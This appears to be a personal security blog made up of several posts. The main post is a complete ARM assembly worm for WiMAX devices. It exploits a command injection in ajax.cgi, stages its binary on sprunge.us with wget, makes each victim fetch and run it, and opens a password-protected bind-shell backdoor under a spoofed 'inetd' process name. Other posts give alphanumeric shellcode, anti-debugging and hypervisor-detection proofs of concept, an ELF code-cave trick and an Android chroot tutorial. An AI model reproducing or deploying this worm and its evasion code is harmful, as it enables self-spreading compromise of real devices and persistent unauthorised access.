Alphanumeric shellcode example for peace and magic.

So a friend of mine was having trouble doing syscalls in his exploration of alphanumeric shellcode, and I thought i would lend him a hand :D enjoy. this all turns into: "h0ppoXH50p0o4nPYhAAAAX1A0jNX4rNDqq" you will need to replace the absolute address magic with your own to have this run :P
[bits 64]

_start:
; printable: 0x20 - 0x7e
; alphanum:  0x30 - 0x39, 0x41 - 0x5A, 0x61 - 0x7A

;     CODE               | ASCII  | HEX
;________________________|________|_________________________
;    and rax, 0x7a7a7a7a ; H%zzzz | 0x48,0x25,0x7a,0x7a,0x7a,0x7a
;    and eax, 0x7a7a7a7a ; %zzzz  | 0x25,0x7a,0x7a,0x7a,0x7a
;    and ax, 0x7a7a      ; f%zz   | 0x66,0x25,0x7a,0x7a
;    and al, 0x7a        ; $z     | 0x24,0x7a
;    sub rax, 0x7a7a7a7a ; H-zzzz | 0x48,0x2d,0x7a,0x7a,0x7a,0x7a
;    sub eax, 0x7a7a7a7a ; -zzzz  | 0x2d,0x7a,0x7a,0x7a,0x7a
;    sub ax, 0x7a7a      ; f-zz   | 0x66,0x2d,0x7a,0x7a
;    sub al, 0x7a        ; ,z     | 0x2c,0x7a
;    xor rax, 0x7a7a7a7a ; H5zzzz | 0x48,0x35,0x7a,0x7a,0x7a,0x7a
;    xor eax, 0x7a7a7a7a ; 5zzzz  | 0x35,0x7a,0x7a,0x7a,0x7a
;    xor ax, 0x7a7a      ; f5zz   | 0x66,0x35,0x7a,0x7a
;    xor al, 0x7a        ; 4z     | 0x34,0x7a
;    cmp rax, 0x7a7a7a7a ; H=zzzz | 0x48,0x3d,0x7a,0x7a,0x7a,0x7a
;    cmp eax, 0x7a7a7a7a ; =zzzz  | 0x3d,0x7a,0x7a,0x7a,0x7a
;    cmp ax, 0x7a7a      ; f=zz   | 0x66,0x3d,0x7a,0x7a
;    cmp al, 0x7a        ; <z     | 0x3c,0x7a
;    push rax            ; P      | 0x50
;    push rbx            ; S      | 0x53
;    push rcx            ; Q      | 0x51
;    push rdx            ; R      | 0x52
;    push rdi            ; W      | 0x57
;    push rsi            ; V      | 0x56
;    push rsp            ; T      | 0x54
;    push rbp            ; U      | 0x55
;    push r8             ; AP     | 0x41,0x50
;    push r9             ; AQ     | 0x41,0x51
;    push r10            ; AR     | 0x41,0x52
;    push r11            ; AS     | 0x41,0x53
;    push r12            ; AT     | 0x41,0x54
;    push r13            ; AU     | 0x41,0x55
;    push r14            ; AV     | 0x41,0x56
;    push r15            ; AW     | 0x41,0x57
;    push ax             ; fP     | 0x66,0x50
;    push bx             ; fS     | 0x66,0x53
;    push cx             ; fQ     | 0x66,0x51
;    push dx             ; fR     | 0x66,0x52
;    push di             ; fW     | 0x66,0x57
;    push si             ; fV     | 0x66,0x56
;    push sp             ; fT     | 0x66,0x54
;    push r8             ; fAP    | 0x66,0x41,0x50
;    push r9w            ; fAQ    | 0x66,0x41,0x51
;    push r10w           ; fAR    | 0x66,0x41,0x52
;    push r11w           ; fAS    | 0x66,0x41,0x53
;    push r12w           ; fAT    | 0x66,0x41,0x54
;    push r13w           ; fAU    | 0x66,0x41,0x55
;    push r14w           ; fAV    | 0x66,0x41,0x56
;    push r15w           ; fAW    | 0x66,0x41,0x57
;    push 0x7a7a7a7a     ; hzzzz  | 0x68,0x7a,0x7a,0x7a,0x7a
;    push word 0x7a7a    ; fhzz   | 0x66,0x68,0x7a,0x7a
;    push 0x7a           ; jz     | 0x6a,7a
;    pop rax             ; X      | 0x58
;    pop rbx             ; [      | 0x5b
;    pop rcx             ; Y      | 0x59
;    pop rdx             ; Z      | 0x5a
;    pop rdi             ; _      | 0x5f
;    pop rsi             ; ^      | 0x5e
;    pop rsp             ; \      | 0x5c
;    pop rbp             ; ]      | 0x5c
;    pop r8              ; AX     | 0x41,0x58
;    pop r9              ; AY     | 0x41,0x59
;    pop r10             ; AZ     | 0x41,0x5a
;    pop r11             ; A[     | 0x41,0x5b
;    pop r12             ; A\     | 0x41,0x5c
;    pop r13             ; A]     | 0x41,0x5d
;    pop r14             ; A^     | 0x41,0x5e
;    pop r15             ; A_     | 0x41,0x5f
;    pop ax             ; fX      | 0x66,0x58
;    pop bx             ; f[      | 0x66,0x5b
;    pop cx             ; fY      | 0x66,0x59
;    pop dx             ; fZ      | 0x66,0x5a
;    pop r8w              ; fAX     | 0x66,0x41,0x58
;    pop r9w              ; fAY     | 0x66,0x41,0x59
;    pop r10w             ; fAZ     | 0x66,0x41,0x5a
;    pop r11w             ; fA[     | 0x66,0x41,0x5b
;    pop r12w             ; fA\     | 0x66,0x41,0x5c
;    pop r13w             ; fA]     | 0x66,0x41,0x5d
;    pop r14w             ; fA^     | 0x66,0x41,0x5e
;    pop r15w             ; fA_     | 0x66,0x41,0x5f
;    jo short 0x7b       ; pz     | 0x70,0x7a
;    jno short 0x7b      ; qz     | 0x71,0x7a
;    jb short 0x7b       ; rz     | 0x72,0x7a
;    jnae short 0x7b     ; rz     | 0x72,0x7a
;    jc short 0x7b       ; rz     | 0x72,0x7a
;    jnb short 0x7b      ; sz     | 0x73,0x7a
;    jae short 0x7b      ; sz     | 0x73,0x7a
;    jnc short 0x7b      ; sz     | 0x73,0x7a
;    jz short 0x7b       ; tz     | 0x74,0x7a
;    je short 0x7b       ; tz     | 0x74,0x7a
;    jnz short 0x7b      ; uz     | 0x75,0x7a
;    jne short 0x7b      ; uz     | 0x75,0x7a
;    jbe short 0x7b      ; vz     | 0x76,0x7a
;    jna short 0x7b      ; vz     | 0x76,0x7a
;    jnbe short 0x7b     ; wz     | 0x77,0x7a
;    ja short 0x7b       ; wz     | 0x77,0x7a
;    js short 0x7b       ; xz     | 0x78,0x7a
;    jns short 0x7b      ; yz     | 0x79,0x7a
;    jp short 0x7b       ; zz     | 0x7a,0x7a
;    jpe short 0x7b      ; zz     | 0x7a,0x7a
;    jnp short 0x7b      ; {z     | 0x7b,0x7a
;    jpo short 0x7b      ; {z     | 0x7b,0x7a
;    jl short 0x7b       ; |z     | 0x7c,0x7a
;    jnge short 0x7b     ; |z     | 0x7c,0x7a
;    jnl short 0x7b      ; }z     | 0x7d,0x7a
;    jge short 0x7b      ; }z     | 0x7d,0x7a
;    jle short 0x7b      ; ~z     | 0x7e,0x7a
;    jng short 0x7b      ; ~z     | 0x7e,0x7a

    push 0x6f707030     ; encoded absolute address preamble
    pop rax
    xor rax, 0x6f307030 ; xor the preamble with the fancy key
    xor al, 0x6e        ; special stuff to pull the value 9f out of our ass
    push rax            ; put the resulting absolute address into rcx
    pop rcx
    push 0x41414141     ; syscall code block key
    pop rax
    xor [rcx+48], eax   ; decode the sycall code block using an offset for more ass pulling
    push 0x4e           ; encoded syscall number for exit
    pop rax
    xor al, 0x72        ; xor it with the key
syscall:
    db 0x4e,0x44,0x71,0x71


Monday, August 3, 2015

Wimax worm POC

This is the non-obfuscated code for the live demonstration worm for a talk I plan to do on the vulnerability of embedded ARM devices. This is a prime example of industry laziness. Have fun :D I am in no way responsible for any use, or damage caused by the use of this code. If you are somehow able to modify this to do harm of any kind, you have modified it enough to be held responsible for your actions.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ THE SCOTCH-WARE LICENSE (Revision 0):
@ aaronryool@gmail.com wrote this file. As long as you retain this notice you
@ can do whatever you want with this stuff. If we meet some day, and you think
@ this stuff is worth it, you can buy me a shot of scotch in return
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.section .text
.global _start
.code 32

@ encrypt everything in layers

spawn_backdoor:
    ldr r7, =2                  @ fork the backdoor process
    sub r1, r1, r1              @ we dont have a process description, just inherit
    svc 0
    cmp r0, #-1                 @ on failure, return
    beq parent
    cmp r0, #0                  @ if this is the child, fork
    beq fork
parent:
    bx lr                       @ continue to the main loop
fork:
    @ socket
    ldr r7, =281
    ldr r0, =2
    ldr r1, =1
    sub r2, r2, r2
    svc 0
    cmp r0, #-1
    beq fork                    @ try again on failure
    cpy r6, r0
    @ bind
    ldr r7, =282
    ldr r1, =backdooraddr
    ldr r2, =16
    svc 0
    cmp r0, #-1
    beq fork                    @ try again on failure
    @ listen
    ldr r7, =284
    cpy r0, r6
    ldr r1, =5
    svc 0
    cmp r0, #-1
    beq fork                    @ try again on failure
    ldr r0, =sock
    str r6, [r0, #0]
fork_loop:
    @ accept
    ldr r7, =285
    cpy r0, r6
    ldr r1, =0
    ldr r2, =0
    svc 0
    cmp r0, #-1
    beq backdoor_cleanup       @ try again on failure
    cpy r6, r0

    ldr r0, =buffer
    sub r1, r1, r1
    sub r2, r2, r2
    sub r3, r3, r3
    bl forkpty
    cmp r0, #-1
    beq backdoor_cleanup
    cmp r0, #0
    bne backdoor_cleanup

    ldr r1, =password           @ load password buffer
    ldr r2, =4
    bl s_read                   @ read that shit in
    cmp r0, #-1
    beq backdoor_cleanup        @ start over on socket failure
    ldr r2, =name               @ load name, aka the password
    ldr r9, [r1, #0]            @ load name value into r9
    ldr r10, [r2, #0]           @ load password value into r10
    cmp r9, r10                 @ do they match?
    bne backdoor_cleanup        @ if not, cleanup and close socket

    sub r10, r10, r10           @ zero out a counter
duploop:
    @ dup2
    ldr r7, =63                 @ duplicate all standard out/in
    cpy r1, r10
    svc 0
    add r10, r10, #1
    cmp r10, #3
    bne duploop

    ldr r7, =11                 @ launch our friend mr. sh using execve
    ldr r0, =shellpath          @ the path to the shell executable
    ldr r1, =shellargv          @ shell argv pointer
    ldr r2, =shellenv           @ shell env pointer
    svc 0

backdoor_cleanup:
    bl close                    @ close socket
    ldr r0, =sock
    ldr r6, [r0, #0]
    bl fork_loop                @ restart

_start:
    ldr r0, [sp, #4]
    ldr r1, =spoof              @ name to spoof
    bl strcpy                   @ rename this bitch

    ldr r0, =13                 @ SIGPIPE
    ldr r1, =1                  @ SIG_IGN
    bl signal
    bl spawn_backdoor           @ spawn backdoor
main_loop:
    ldr r10, =0x80808081        @ precalculated division multiplier for 255
    ldr r11, =7                 @ precalculated shift for divisor
    bl random                   @ call random number generator
    ldr r1, =[ip+3]             @ load the last byte of the ip address in socket struct
    strb r0, [r1, #0]           @ write our random number there
    ldr r10, =sockaddr          @ load the address of the struct
    bl connect                  @ connect to the randomly generated host
    cmp r0, #-1
    beq main_loop               @ try again on failure
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    ldr r1, =check_payload      @ load the vulnerability test payload
    ldr r2, =126                @ its 126 bytes in length
    bl s_write                  @ send it out
    cmp r0, #-1
    beq cleanup                 @ on socket failure, go to cleanup

    bl read_u2response          @ swallow http header

    bl s_read                   @ s_read in nl
    ldr r2, =4                  @ s_read in 4 bytes, we are checking for the sring root
    bl s_read
    cmp r0, #-1
    beq cleanup                 @ on socket fail, cleanup

    ldr r8, =0x746f6f72         @ r8 = 'root'
    ldr r10, [r1, #0]           @ swap whats in the buffer with whats in r10
    cmp r8, r10                 @ are we root?
    bne cleanup                 @ if not, start over
    bl close                    @ close the socket
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    ldr r10, =sockaddr          @ load remote socket struct again
    bl connect                  @ connect back
    cmp r0, #-1
    beq cleanup                 @ restart on failure
    
    ldr r1, =check_payload      @ load the infection test payload
    ldr r2, =71                 @ its 71 bytes in length
    bl s_write                  @ send it out
    cmp r0, #-1
    beq cleanup                 @ on socket failure, go to cleanup

    ldr r1, =check_infected     @ load the infection test payload
    ldr r2, =77                 @ its 77 bytes in length
    bl s_write                  @ send it out
    cmp r0, #-1
    beq cleanup                 @ on socket failure, go to cleanup

    ldr r1, =check_payload+77   @ load the closing out parts from out check payload
    ldr r2, =49                 @ 49 bytes of http closing statement
    bl s_write                  @ send this bitch out
    cmp r0, #-1
    beq cleanup                 @ on socket fail, start over

    bl read_u2response          @ swallow http header

    bl s_read                   @ s_read in nl
    ldr r2, =4                  @ s_read in 4 bytes, we are checking for the sring woot
    bl s_read
    cmp r0, #-1
    beq cleanup                 @ on socket fail, cleanup

    ldr r8, =0x746f6f77         @ r8 = 'woot'
    ldr r10, [r1, #0]           @ swap whats in the buffer with whats in r10
    cmp r8, r10                 @ does that shit exist?
    beq cleanup                 @ if so, start over
    bl close                    @ close the socket
@!!!!!!!!MAGIC!!!!!!!!!!!
magic:
    ldr r10, =localsock         @ load a socket struct to the local box
    bl connect                  @ connect to ourselves
    cmp r0, #-1
    beq magic                   @ on failure try again

    ldr r1, =check_payload      @ reuse the first 71 bytes of check_payload
    ldr r2, =71
    bl s_write                  @ send it out
    cmp r0, #-1
    beq magic                   @ on socket fail, start the process over

    ldr r1, =store_wormness     @ load our third party store payload
    ldr r2, =100                @ its 100 bytes long
    bl s_write                  @ send it out
    cmp r0, #-1
    beq magic                   @ on fail try everything again

    ldr r1, =check_payload+77   @ load the closing out parts from out check payload
    ldr r2, =49                 @ 49 bytes of http closing statement
    bl s_write                  @ send this bitch out
    cmp r0, #-1
    beq magic                   @ on socket fail, start over

    bl read_u2response          @ read in the http response header
    ldr r1, =buffer             @ load reuseable buffer address
    ldr r2, =23                 @ read 23 bytes: newline + sprunge address
    bl s_read                   @ read it in
    cmp r0, #-1
    beq magic                   @ on sock fail, restart
    bl close                    @ close out the socket
super_magic:
    ldr r10, =sockaddr          @ load remote socket struct again
    bl connect                  @ connect back
    cmp r0, #-1
    beq super_magic             @ restart on failure

    ldr r1, =check_payload      @ load intro from check payload again
    ldr r2, =71
    bl s_write                  @ send it
    cmp r0, #-1
    beq super_magic             @ on failure, try again

    ldr r1, =send_wormness      @ load the send payload
    ldr r2, =7                  @ first 7 bytes
    bl s_write                  @ send it out
    cmp r0, #-1
    beq super_magic             @ on socket fail, retry

    ldr r1, =[buffer+1]         @ ditch the leading new line, send the url
    ldr r2, =22                 @ it is guarenteed to be 22 bytes long
    bl s_write                  @ send it
    cmp r0, #-1
    beq super_magic             @ on failure, try again

    ldr r1, =[send_wormness+7]  @ load the beginning of the rest of the send payload
    ldr r2, =81                 @ 81 bytes of sexy
    bl s_write                  @ send it
    cmp r0, #-1
    beq super_magic             @ restart this madness on failure

    ldr r1, =check_payload+77   @ load the http closing statement
    ldr r2, =49                 @ blah blah size blah blah
    bl s_write                  @ send it
    cmp r0, #-1
    beq super_magic             @ check for socket fail, you know retry
    bl close                    @ close the socket
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



cleanup:
    bl close
    b main_loop

debug:
    push {lr, r6}
    ldr r6, =1
    bl s_write
    pop {pc, r6}

@ exit(r0)
exit:
    ldr r7, =1
    svc 0

read_u2response:
push {lr}
    sub r9, r9, r9      @ zero out counter
    ldr r1, =buffer     @ store data in buffer
    ldr r2, =1          @ s_read 1 byte
read_start:
    bl s_read           @ s_read in byte
    cmp r0, #-1
    bxeq lr

    ldrb r10, [r1, #0]  @ swap byte from buffer into r10
    cmp r10, #0x0d     @ is this a carriage return?
    beq read_match      @ if so look for another
    b read_start        @ if not s_read in another byte

read_match:
    bl s_read           @ s_read in the newline
    cmp r0, #-1
    bxeq lr
    bl s_read           @ s_read in the next character
    cmp r0, #-1
    bxeq lr
    ldrb r10, [r1, #0]  @ swap byte from buffer into r10
    cmp r10, #0x0d      @ is this a carriage return?
    bne read_start
pop {pc}

random:
    @ time seed
    ldr r7, =43
    sub r0, r0, r0
    svc 0

    @ Implementation of George Marsaglia's xorshift PRNG -> http://www.jstatsoft.org/v11/i04/paper
    eor r0, r0, lsl #13
    eor r0, r0, lsr #9
    eor r0, r0, lsr #7

    @ r0 = r0 % r10
    cpy r1, r10            @ r1 -> magic_number
    umull r1, r2, r1, r0   @ r1 -> Lower32Bits(r1*r0). r2 ← Upper32Bits(r1*r0)
    mov r0, r1, LSR r11    @ r0 -> r1 >> r11
    add r0, r0, #1
    bx lr

s_write:
    ldr r7, =4
    cpy r0, r6
    svc 0
    bx lr

s_read:
    ldr r7, =3
    cpy r0, r6
    svc 0
    bx lr

close:
    ldr r7, =6
    cpy r0, r6
    svc 0
    bx lr

connect:
@ connect to a victim
    @ socket
    ldr r7, =281
    ldr r0, =2
    ldr r1, =1
    sub r2, r2, r2
    svc 0
    @connect
    cpy r6, r0
    ldr r7, =283
    cpy r1, r10
    ldr r2, =16
    svc 0
    bx lr

.section .data
sockaddr:
.short 0x2      @ AF_INET
.short 0x5000 @ port
ip:
.byte 10,0,0,2 @ IP

localsock:
.short 0x2      @ AF_INET
.short 0x5000 @ port
.byte 127,0,0,1 @ IP

backdooraddr:
.short 0x2      @ AF_INET
.short 0x9A02 @ port
.space 4        @ INADDR_ANY


check_payload: @ 71 | 77 -> 49
.asciz "GET /ajax.cgi?action=tag_ipPing&pip=127.0.0.1+%3E%2Fdev%2Fnull%20%26%26whoami HTTP/1.0\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n"

check_infected:
.asciz "if%20%5B%20-e%208%3D%3DD%20%5D%3Bthen%20echo%20woot%3Belse%20echo%20booo%3Bfi"

store_wormness: @ 100 inject this on local box
.asciz "wget%20-q%20-O%20-%20--post-data%3D%22sprunge%3D%24(cat%20.%2F8%3D%3DD)%22%20http%3A%2F%2Fsprunge.us"

send_wormness: @ 7 -> 81
.asciz "wget%20%20-O%208%3D%3DD%202%3E%2Fdev%2Fnull%26%26(.%2F8%3D%3DD%20%26%3E%2Fdev%2Fnull%26)"


buffer: .space 23
name: .asciz "8==D"
spoof: .asciz "inetd"
password: .space 4
shellpath: .asciz "/bin/sh"
arg0: .asciz "/sbin/lighttpd"
arg1: .asciz "-i"
shellargv: .word arg0, arg1, 0
env0: .asciz "TERM=xterm"
env1: .asciz "PS1=8==D "
shellenv: .word env0, env1, 0
sock: .space 4



Monday, July 6, 2015

Drive by multi-architecture examples of software breakpoint detection :D

; intel x86_64
 mov rcx, rsi ; move size argument into rcx for the loop
 mov rsi, rdi ; move the the text pointer to rsi for printing
 xor rax, rax ; clear out registers
 xor rdi, rdi
scan:    ; scan for breakpoints
 cmp byte [rsi], 0xCC
 je fuck_you
 inc rsi
loop scan
 xor rdi, rdi
 ret
fuck_you:
 xor rdi, rdi
 mov al, 1
 ret



@ ARM
scan:
        .code 32
        ldr r3, =0xE7F00000     @ load breakpoint constant
        ldr r4, =0xFFFF0000     @ mask
loop:
        ldr r2, [r0]    @ load byte code into r2
        and r2, r4      @ clear out extra data in bytecode with mask
        cmp r2, r3      @ is it a breakpoint?
        beq fuck        @ if so FUCK
        cmp r1, #0      @ are we at the end?
        beq safe        @ if so we are safe
        sub r1, #1      @ decrement the counter
        add r0, #1      @ increment our pointer
        bne loop        @ if we are still looping, loop
safe:
        mov r0, #0      @ return false
        mov r1, r0
        bx lr
fuck:
        mov r0, #0x1    @ return true
        mov r1, #0
        bx lr



# MIPS
scan:
        li $t0, 0x5000D                 # breakpoint constant
loop:
        lw $t3, ($a0)                   # load bytecode
        beq $t3, $t0, fuck              # if this is a breakpoint fucked
        beq $t3, 0, safe                # if the counter is 0 we are safe
        subu $a1, 1                     # decrement counter
        addu $a0, 1                     # increment our pointer
        j loop                          # if we are looping loop
 
safe:
        li $v0, 0x0     # return false
        li $v1, 0x0
        jr $ra
 
fuck:
        li $v0, 0x1     # return true
        li $v1, 0x0
        jr $ra

The stosb detection method for qemu lives AGAIN, only my version checks for a segfault because they patched this, but they patched it DIRTY xD

This is technically a new vulnerability found by myself that checks for BOTH mine and the original vulnerability that would fail to write over the memory location directly below what would be a jmp to say we were in fact in the matrix.
// ------------------------------------------------------------------------------
// THE BEER-WARE LICENSE (Revision 43):
// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a beer in return
// ------------------------------------------------------------------------------

#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/mman.h>

int main(unsigned a);

__sighandler_t handler(int sig)  // our signal handler function
{
 switch(sig)
 {
  case SIGSEGV:  // when segfaults happen
   main(0xC0DE); // assume they have to be because of the bug and tell us we are in the matrix
  break;
 }
}
unsigned qemu(void)
{
 void *page =(void *) ((unsigned long) (&&assembly) &~(getpagesize() - 1)); // get the page the assembly is on
 mprotect(page, getpagesize(), PROT_READ | PROT_WRITE | PROT_EXEC); // mark that shit as RWE for self modification
assembly: asm volatile(
".intel_syntax noprefix\n"
 "mov eax, 0x90\n" // move a nop into eax for copying
 "mov ecx, 9\n"  // move 9 into ecx for the number of bytes the byte code is from the offset to the jmp
 "mov edi, offset $\n" // mov the address of the start of this instruction into edi for rep
 "rep stosb\n"  // finally, repeat that byte over the memory region
 "jmp _qemu\n"  // this should be overwritten, if it isnt, some naughty child is running an old version of qemu lol, and they are in the matrix
 "jecxz noqemu\n"  // if ecx is 0, we are not in the matrix by definition lol, if it is not 0, then
"_qemu:\n"   // this is the matrix
 "mov eax, 1\n"  // follow cdecl calling convention and return 1 in eax
 "ret\n"
"noqemu:\n"   // this is not the matrix
 "xor eax, eax\n"); // return 0 according to cdecl calling convention
}


int main(unsigned a)
{
 if(a==0xC0DE) goto matrix; // if this shit is from a segfault, we are matrix status
 signal(SIGSEGV, &handler); // register the segfault signal to be caught by our handler
 
 if(qemu()) goto matrix;  // if this is an old version of qemu, and the standard vulnerability is present, MATRIX (upgrade yo shit foo)
 puts("Isn't real life boring?"); // if we get here, this is boring reality :( no cool ninja moves today bro lol
 exit(0);

matrix:
 puts("The Matrix haz you Neo..."); // this is where you would put ninja moves, jack in or jack off, your choice ;)
 exit(1);
}

Quick POC on detecting hyper-visors using redundant rep prefixes

// ------------------------------------------------------------------------------
// THE BEER-WARE LICENSE (Revision 43):
// <aaronryool@gmail.com> wrote this file. As long as you retain this notice you
// can do whatever you want with this stuff. If we meet some day, and you think
// this stuff is worth it, you can buy me a beer in return
// ------------------------------------------------------------------------------

#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/mman.h>

int main(unsigned a);

__sighandler_t handler(int sig)  // our signal handler function
{
 switch(sig)
 {
  case SIGSEGV:  // when segfaults happen
   main(0xC0DE); // assume they have to be because of the bug and tell us we are in the matrix
  break;
 }
}

int main(unsigned a)
{
 if(a==0xC0DE) goto irl;  // if this shit is from a segfault, we are in real life :(
 signal(SIGSEGV, &handler); // register the segfault signal to be caught by our handler
 
asm(
        ".intel_syntax noprefix\n"
        "xor ecx, ecx\n" // we arent actually copying anything, so the counter is zero
        ".byte 0xf3, 0xf3, 0xf3, 0xf3, 0xf3\n" // redundant rep prefixes
        ".byte 0xf3, 0xf3, 0xf3, 0xf3, 0xf3\n" // ...
        ".byte 0xf3, 0xf3, 0xf3, 0xf3, 0xf3\n" // ...
        ".byte  0xa4\n" // movsb
);
 puts("The Matrix haz you Neo..."); // this is where you would put ninja moves, jack in or jack off, your choice ;)
 exit(1);
irl:
 puts("Isn't real life boring?"); // if we get here, this is boring reality :( no cool ninja moves today bro lol
 exit(0);
}
Think you are man enough to solve this baby? ;)

Simple Example of time based detection of hypervisors

Well the theory behind this is simple lol. Time the execution of a series of instructions in a statistically diverse range of test cases under rest conditions, and then do this in a few hyper-visors. When you analyze the data from the hyper-visors, you will notice large peaks that happen intermittently. Find the average of those peaks, then find out the frequency of these in the normal operating environment. The code below does just that, although i was limited in the number of test cases as i did this on a single machine lol. Also, please note that in order to implement this into something more robust, you need to add code that detects the base state of the machine it is on before it tests for the existence of a hyper-visor, as this will throw LOTS of false positives under heavy load. This is common with any kind of time based detection method.
Running in the real world


Running inside a hypervisor





12 byte code cave inside an elf header

So I was playing around with minimalism, and I like to get pretty dirty when this happens. So i started seeing what i could corrupt in an elf header until Linux refused the binary. I found that I could corrupt the twelve bytes directly following the magic sequence. This has some interesting side effects. The first being that all debugging software I attempted to run this in refused to acknowledge that it was even an executable lol. readelf was able to see that there was in fact an elf header, but gave back false information. The GNU file command can see that it is in fact an elf, but doesn't recognize anything other than that, given that most of that information was defaced. The incredibly scary bit is that Linux is able to in fact run this file without any issue lol.

Saturday, July 4, 2015

Obfuscation: a comic strip series, episode: 0










Why yes, this is in fact a comic made out of code lol. think you can solve the challenge? Here is the code.

Hint: the comic code is a hint, and I gave you every letter of the alphabet ;)

Stay tuned for more :D

Friday, June 19, 2015

Putting Linux on your Android device using debootstrap and chroot

Are you ready for this? lol

Ok, so first thing first. You will need a few things done BEFORE you attempt this tutorial:

  1. A rooted android device of sorts with debugging enabled and busybox installed
  2. An sdcard to store the debian image on
  3. A Linux machine (or live cd) to prepare the debian system image
  4. ADB for remounting the system partition and pushing startup scripts
  5. A terminal application installed on your droid
  6. and about an hour of free time
Lets get right into it

open up a terminal, and make a directory that you will be storing all of the files and things we create for easy cleanup later. I called mine linux_on_android. change to that directory, all instructions from here on out will be relative to whatever directory you are currently residing in after this step.

Next, we create an empty raw disk image, make a directory to mount it under, create a filesystem on the image, and mount it under our new mount point.
Now lets change into our mnt directory, install debootstrap, and use it to install a base system into our mounted image for the architecture of our android device, in this case it is i386, in most cases this will actually be armhf especially if this is being done on a phone.

Once this has finished, we now need to push the debian system image to the sdcard, go get some coffee lol, or mount your sdcard and transfer it using the file manager, this just makes it easier for me, because I was doing this to a VM lol.
Now that we have that bit done, we move onto the fun bits. lets start adb shell, setup a chroot environment, and chroot into our new debian image :D

the long haul is almost done :D make sure you are somehow connected to the internet on your device, and lets install some packages.
Update package lists
install ssh server
build utilities and nmap

The following are an example startup, and shutdown script for debian. start_debian: http://pastebin.com/5Ujk3TKa
stop_debian: http://pastebin.com/CkGMA4ty


Now you can open up your terminal, and start and stop debian at will. to log into your new debian image, connect using your ssh client of choice, I kinda like connectbot, so that is what i will use in the screenshots: